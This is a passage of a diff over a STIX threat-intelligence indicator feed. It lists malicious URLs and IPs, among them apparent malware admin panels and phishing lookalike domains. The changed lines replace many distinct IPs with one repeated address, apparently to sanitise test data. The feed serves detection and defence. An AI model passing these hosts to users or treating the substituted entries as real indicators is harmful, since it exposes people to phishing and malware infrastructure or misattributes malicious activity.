CyberCrime","id":"indicator--91ef9dde-3f0a-472c-b8ec-a1b9951acb50","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-02-13T02:02:41.467Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-13T02:02:41.467Z"} {"created":"2020-02-13T02:02:52.653Z","description":"TS ID: 55311776233; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--948a3e06-3481-4873-94e7-8ab068284aba","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-13T02:02:52.653Z","name":"mal_url: http://felicombo.club/Zebra/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://felicombo.club/Zebra/admin.php']","type":"indicator","valid_from":"2020-02-13T02:02:52.653Z"} {"created":"2020-02-13T02:03:16.624Z","description":"TS ID: 55311776246; iType: mal_url; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime","id":"indicator--3b3faeec-4f78-41f2-acd8-13090336f058","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-13T02:03:16.624Z","name":"mal_url: http://pdocxoffice.com/Panel/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://pdocxoffice.com/Panel/login.php']","type":"indicator","valid_from":"2020-02-13T02:03:16.624Z"} {"created":"2020-02-13T02:03:36.577Z","description":"TS ID: 55311776248; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--ae6ff4c4-73c1-473a-90cb-99f135240243","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-52"],"modified":"2020-02-13T02:03:36.577Z","name":"mal_url: http://megaeditores.com/fgv/PHP/index.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://megaeditores.com/fgv/PHP/index.php']","type":"indicator","valid_from":"2020-02-13T02:03:36.577Z"} -{"created":"2020-02-13T02:03:38.86Z","description":"TS ID: 55311776237; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--104abde1-c4e9-45a2-85e1-525ea3bec752","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-23"],"modified":"2020-02-13T02:03:38.86Z","name":"mal_url: http://45.153.185.12/prUjRYcU2rqFpZqv/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://45.153.185.12/prUjRYcU2rqFpZqv/login.php']","type":"indicator","valid_from":"2020-02-13T02:03:38.86Z"} +{"created":"2020-02-13T02:03:38.86Z","description":"TS ID: 55311776237; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--104abde1-c4e9-45a2-85e1-525ea3bec752","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-23"],"modified":"2020-02-13T02:03:38.86Z","name":"mal_url: http://89.160.20.156/prUjRYcU2rqFpZqv/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/prUjRYcU2rqFpZqv/login.php']","type":"indicator","valid_from":"2020-02-13T02:03:38.86Z"} {"created":"2020-02-20T04:06:53.787Z","description":"TS ID: 55316616622; iType: mal_url; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime","id":"indicator--57d0bd25-4211-4e2e-8a4e-31e38eeda90b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-20T04:06:53.787Z","name":"mal_url: http://hotlips.top/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://hotlips.top/login']","type":"indicator","valid_from":"2020-02-20T04:06:53.787Z"} {"created":"2020-02-20T04:08:45.548Z","description":"TS ID: 55316617564; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--d11be9c2-b408-42a4-a4ad-0ede3c1709f0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-20T04:08:45.548Z","name":"mal_url: http://aflamdirectory.com/wp-content/ip/login/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://aflamdirectory.com/wp-content/ip/login/']","type":"indicator","valid_from":"2020-02-20T04:08:45.548Z"} {"created":"2020-02-20T04:08:45.601Z","description":"TS ID: 55316617187; iType: mal_url; State: active; Org: Telenet Ltd.; Source: CyberCrime","id":"indicator--ed5ed1a3-8090-4db3-92cb-3b7b733fa28e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-20T04:08:45.601Z","name":"mal_url: http://ayoobtextlie.com/craks/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ayoobtextlie.com/craks/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T04:08:45.601Z"} -{"created":"2020-02-20T04:09:16.891Z","description":"TS ID: 55316616322; iType: mal_ip; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime","id":"indicator--6c201663-b1e4-483e-821b-0fe74aecc497","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-20T04:09:16.891Z","name":"mal_ip: 5.188.9.33","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '5.188.9.33']","type":"indicator","valid_from":"2020-02-20T04:09:16.891Z"} +{"created":"2020-02-20T04:09:16.891Z","description":"TS ID: 55316616322; iType: mal_ip; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime","id":"indicator--6c201663-b1e4-483e-821b-0fe74aecc497","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-20T04:09:16.891Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-20T04:09:16.891Z"} {"created":"2020-02-20T04:11:00.455Z","description":"TS ID: 55316616996; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--8203935f-fb3f-418c-945d-40fca5ef088d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-20T04:11:00.455Z","name":"mal_url: http://mecharnise.ir/ca10/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://mecharnise.ir/ca10/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T04:11:00.455Z"} -{"created":"2020-02-20T04:28:36.154Z","description":"TS ID: 55321824436; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--238f73e8-938d-4d08-9705-b1b669c129b2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-77"],"modified":"2020-02-20T04:28:36.154Z","name":"mal_url: http://5.8.88.27/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://5.8.88.27/login']","type":"indicator","valid_from":"2020-02-20T04:28:36.154Z"} +{"created":"2020-02-20T04:28:36.154Z","description":"TS ID: 55321824436; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--238f73e8-938d-4d08-9705-b1b669c129b2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-77"],"modified":"2020-02-20T04:28:36.154Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-02-20T04:28:36.154Z"} {"created":"2020-02-20T04:28:36.172Z","description":"TS ID: 55321824399; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime","id":"indicator--6ff21635-ac08-4afe-b5e7-c18dfe320f0f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-70"],"modified":"2020-02-20T04:28:36.172Z","name":"mal_url: http://23.247.102.18/4/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://23.247.102.18/4/panel/admin.php']","type":"indicator","valid_from":"2020-02-20T04:28:36.172Z"} {"created":"2020-02-20T04:28:36.19Z","description":"TS ID: 55321824397; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime","id":"indicator--9f55ff73-b6b6-476d-bb32-b9a7f8b16e93","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-70"],"modified":"2020-02-20T04:28:36.19Z","name":"mal_url: http://23.247.102.18/6/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://23.247.102.18/6/panel/admin.php']","type":"indicator","valid_from":"2020-02-20T04:28:36.19Z"} {"created":"2020-02-20T04:30:25.248Z","description":"TS ID: 55321824409; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--4abbf2ea-6e46-48e8-b74d-1928c92e6277","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-71"],"modified":"2020-02-20T04:30:25.248Z","name":"mal_url: http://f0400035.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0400035.xsph.ru/login']","type":"indicator","valid_from":"2020-02-20T04:30:25.248Z"} -{"created":"2020-02-20T04:31:26.488Z","description":"TS ID: 55321824418; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--8678d0a4-2b3c-4cea-a745-796f996e18bc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-20T04:31:26.488Z","name":"mal_ip: 217.8.117.22","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '217.8.117.22']","type":"indicator","valid_from":"2020-02-20T04:31:26.488Z"} +{"created":"2020-02-20T04:31:26.488Z","description":"TS ID: 55321824418; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--8678d0a4-2b3c-4cea-a745-796f996e18bc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-20T04:31:26.488Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-20T04:31:26.488Z"} {"created":"2020-02-20T04:31:26.532Z","description":"TS ID: 55321824403; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime","id":"indicator--bfd713ad-3d94-441a-b6bc-135ce911b580","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-70"],"modified":"2020-02-20T04:31:26.532Z","name":"mal_url: http://23.247.102.18/panel/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://23.247.102.18/panel/panel/admin.php']","type":"indicator","valid_from":"2020-02-20T04:31:26.532Z"} {"created":"2020-02-20T04:31:26.582Z","description":"TS ID: 55321824401; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime","id":"indicator--f43a4d56-b27f-41f0-917b-52358df31e13","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-70"],"modified":"2020-02-20T04:31:26.582Z","name":"mal_url: http://23.247.102.18/2/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://23.247.102.18/2/panel/admin.php']","type":"indicator","valid_from":"2020-02-20T04:31:26.582Z"} -{"created":"2020-02-20T04:32:16.603Z","description":"TS ID: 55321824432; iType: mal_ip; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--36d62b8e-77db-4111-be17-d0a3e20bbd9d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-41"],"modified":"2020-02-20T04:32:16.603Z","name":"mal_ip: 5.8.88.35","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '5.8.88.35']","type":"indicator","valid_from":"2020-02-20T04:32:16.603Z"} -{"created":"2020-02-20T04:32:52.041Z","description":"TS ID: 55321824444; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--b6863ec6-1752-43b3-b748-ee8a29b6a52e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-20T04:32:52.041Z","name":"mal_ip: 2.57.91.231","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '2.57.91.231']","type":"indicator","valid_from":"2020-02-20T04:32:52.041Z"} +{"created":"2020-02-20T04:32:16.603Z","description":"TS ID: 55321824432; iType: mal_ip; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--36d62b8e-77db-4111-be17-d0a3e20bbd9d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-41"],"modified":"2020-02-20T04:32:16.603Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-20T04:32:16.603Z"} +{"created":"2020-02-20T04:32:52.041Z","description":"TS ID: 55321824444; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--b6863ec6-1752-43b3-b748-ee8a29b6a52e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-20T04:32:52.041Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-20T04:32:52.041Z"} {"created":"2020-02-20T04:32:52.057Z","description":"TS ID: 55321824423; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--fb1aa473-4d9d-46a3-b053-ae7c051d0e14","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-20T04:32:52.057Z","name":"mal_url: http://lae9ac50.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://lae9ac50.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-02-20T04:32:52.057Z"} {"created":"2020-02-20T04:32:52.074Z","description":"TS ID: 55321824417; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--f4447d70-3217-4319-9b89-4439db608f67","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-02-20T04:32:52.074Z","name":"mal_url: http://ld01c555.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ld01c555.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-02-20T04:32:52.074Z"} {"created":"2020-02-20T04:49:13.452Z","description":"TS ID: 55324942456; iType: mal_url; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime","id":"indicator--93e03851-428e-4e25-9fa6-17383426a6d7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-20T04:49:13.452Z","name":"mal_url: http://borrdrillling.com/psm91/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://borrdrillling.com/psm91/panel/admin.php']","type":"indicator","valid_from":"2020-02-20T04:49:13.452Z"} {"created":"2020-02-20T04:49:22.233Z","description":"TS ID: 55324942451; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--ddce3ac3-2e92-4c94-9537-acefcbfecfc0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-20T04:49:22.233Z","name":"mal_url: http://wtfshop.myjino.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://wtfshop.myjino.ru/login']","type":"indicator","valid_from":"2020-02-20T04:49:22.233Z"} {"created":"2020-02-20T04:50:21.678Z","description":"TS ID: 55324942453; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--d4e1621e-ff57-4881-bf03-67f89c1db651","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-20T04:50:21.678Z","name":"mal_url: http://minecrafttusa1.myjino.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://minecrafttusa1.myjino.ru/login']","type":"indicator","valid_from":"2020-02-20T04:50:21.678Z"} -{"created":"2020-02-20T04:50:21.708Z","description":"TS ID: 55324942431; iType: mal_ip; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--99db47e4-6284-47db-a3bb-70dfcac899c2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-20"],"modified":"2020-02-20T04:50:21.708Z","name":"mal_ip: 141.8.194.74","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '141.8.194.74']","type":"indicator","valid_from":"2020-02-20T04:50:21.708Z"} -{"created":"2020-02-20T04:50:33.473Z","description":"TS ID: 55324942449; iType: mal_ip; State: active; Org: Alicloud-us; Source: CyberCrime","id":"indicator--75f014d9-2c40-4fa1-a05e-43521af4a944","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-36"],"modified":"2020-02-20T04:50:33.473Z","name":"mal_ip: 47.252.11.134","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '47.252.11.134']","type":"indicator","valid_from":"2020-02-20T04:50:33.473Z"} +{"created":"2020-02-20T04:50:21.708Z","description":"TS ID: 55324942431; iType: mal_ip; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--99db47e4-6284-47db-a3bb-70dfcac899c2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-20"],"modified":"2020-02-20T04:50:21.708Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-20T04:50:21.708Z"} +{"created":"2020-02-20T04:50:33.473Z","description":"TS ID: 55324942449; iType: mal_ip; State: active; Org: Alicloud-us; Source: CyberCrime","id":"indicator--75f014d9-2c40-4fa1-a05e-43521af4a944","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-36"],"modified":"2020-02-20T04:50:33.473Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-20T04:50:33.473Z"} {"created":"2020-02-20T04:51:08.292Z","description":"TS ID: 55324942438; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--e5ae9133-c459-4130-b2cc-6bfc3d1bba08","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-20T04:51:08.292Z","name":"mal_url: http://amazon-fr.fun/admin/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://amazon-fr.fun/admin/']","type":"indicator","valid_from":"2020-02-20T04:51:08.292Z"} -{"created":"2020-02-20T05:16:07.933Z","description":"TS ID: 55328307473; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--19914258-5bed-4f35-8f57-f639b0d9c1a0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-70"],"modified":"2020-02-20T05:16:07.933Z","name":"mal_url: http://5.8.88.68/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://5.8.88.68/login']","type":"indicator","valid_from":"2020-02-20T05:16:07.933Z"} +{"created":"2020-02-20T05:16:07.933Z","description":"TS ID: 55328307473; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--19914258-5bed-4f35-8f57-f639b0d9c1a0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-70"],"modified":"2020-02-20T05:16:07.933Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-02-20T05:16:07.933Z"} {"created":"2020-02-20T05:16:27.52Z","description":"TS ID: 55330801573; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--a1d0cc69-641e-4588-92f4-0ad9713860e1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-79"],"modified":"2020-02-20T05:16:27.52Z","name":"mal_url: http://f0400017.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0400017.xsph.ru/login']","type":"indicator","valid_from":"2020-02-20T05:16:27.52Z"} {"created":"2020-02-20T05:16:27.557Z","description":"TS ID: 55330801572; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--52371067-94be-4a79-b45d-8de115e81e86","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-62"],"modified":"2020-02-20T05:16:27.557Z","name":"mal_url: http://f0391202.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0391202.xsph.ru/login']","type":"indicator","valid_from":"2020-02-20T05:16:27.557Z"} {"created":"2020-02-20T05:16:37.354Z","description":"TS ID: 55328307469; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--0e0682f9-a160-46c2-ba7f-ba9dc2858f7e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-20T05:16:37.354Z","name":"mal_url: http://ld7fa9c9.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ld7fa9c9.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-02-20T05:16:37.354Z"} -{"created":"2020-02-20T05:16:41.613Z","description":"TS ID: 55330801557; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime","id":"indicator--c7e63dd5-c41f-4fd4-bbaa-8b54a1a1a227","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-64"],"modified":"2020-02-20T05:16:41.613Z","name":"mal_ip: 161.117.178.167","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '161.117.178.167']","type":"indicator","valid_from":"2020-02-20T05:16:41.613Z"} +{"created":"2020-02-20T05:16:41.613Z","description":"TS ID: 55330801557; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime","id":"indicator--c7e63dd5-c41f-4fd4-bbaa-8b54a1a1a227","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-64"],"modified":"2020-02-20T05:16:41.613Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-20T05:16:41.613Z"} {"created":"2020-02-20T05:16:57.739Z","description":"TS ID: 55328307494; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime","id":"indicator--9f847df6-9c88-4a03-b852-394fd8a77f58","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-20T05:16:57.739Z","name":"mal_url: http://referral-casino.club/1/stats/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://referral-casino.club/1/stats/admin.php']","type":"indicator","valid_from":"2020-02-20T05:16:57.739Z"} {"created":"2020-02-20T05:16:57.764Z","description":"TS ID: 55328307481; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime","id":"indicator--479ea508-2ae1-4aea-825b-e83914fb8d53","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-20T05:16:57.764Z","name":"mal_url: http://brokenhead.xyz/Work5/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://brokenhead.xyz/Work5/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:16:57.764Z"} {"created":"2020-02-20T05:16:57.791Z","description":"TS ID: 55328307476; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime","id":"indicator--051488db-6441-4ca9-9e5f-c8656e3b1d9f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-53"],"modified":"2020-02-20T05:16:57.791Z","name":"mal_url: http://mediagift.vn/.ki/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://mediagift.vn/.ki/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:16:57.791Z"} -{"created":"2020-02-20T05:17:10.129Z","description":"TS ID: 55328307464; iType: mal_ip; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--d5a928aa-3237-4c44-93e8-f73eb20dc728","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-20T05:17:10.129Z","name":"mal_ip: 185.98.87.59","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '185.98.87.59']","type":"indicator","valid_from":"2020-02-20T05:17:10.129Z"} +{"created":"2020-02-20T05:17:10.129Z","description":"TS ID: 55328307464; iType: mal_ip; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--d5a928aa-3237-4c44-93e8-f73eb20dc728","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-20T05:17:10.129Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-20T05:17:10.129Z"} {"created":"2020-02-20T05:18:20.205Z","description":"TS ID: 55330801629; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime","id":"indicator--db19cb4e-25ad-46d3-a944-6e53f62d230c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-92"],"modified":"2020-02-20T05:18:20.205Z","name":"mal_url: http://liweff.eu/vla/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://liweff.eu/vla/panel/admin.php']","type":"indicator","valid_from":"2020-02-20T05:18:20.205Z"} {"created":"2020-02-20T05:18:20.412Z","description":"TS ID: 55328307485; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime","id":"indicator--438a519a-17ed-422b-a21d-0262b4b2fc0e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-20T05:18:20.412Z","name":"mal_url: http://brokenhead.xyz/Work2/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://brokenhead.xyz/Work2/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:18:20.412Z"} {"created":"2020-02-20T05:18:22.703Z","description":"TS ID: 55330801601; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime","id":"indicator--7279d49d-39e4-42d1-8fb7-14ddb56d67d7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-20T05:18:22.703Z","name":"mal_url: http://castmart.ga/~zadmin/lmark/pop/uMc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://castmart.ga/~zadmin/lmark/pop/uMc.php']","type":"indicator","valid_from":"2020-02-20T05:18:22.703Z"} @@ -484,7 +484,7 @@ {"created":"2020-02-20T05:24:01.214Z","description":"TS ID: 55330801569; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--434af7fc-410e-404d-8c8c-8875f92cb0c0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-02-20T05:24:01.214Z","name":"mal_url: http://f0402912.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 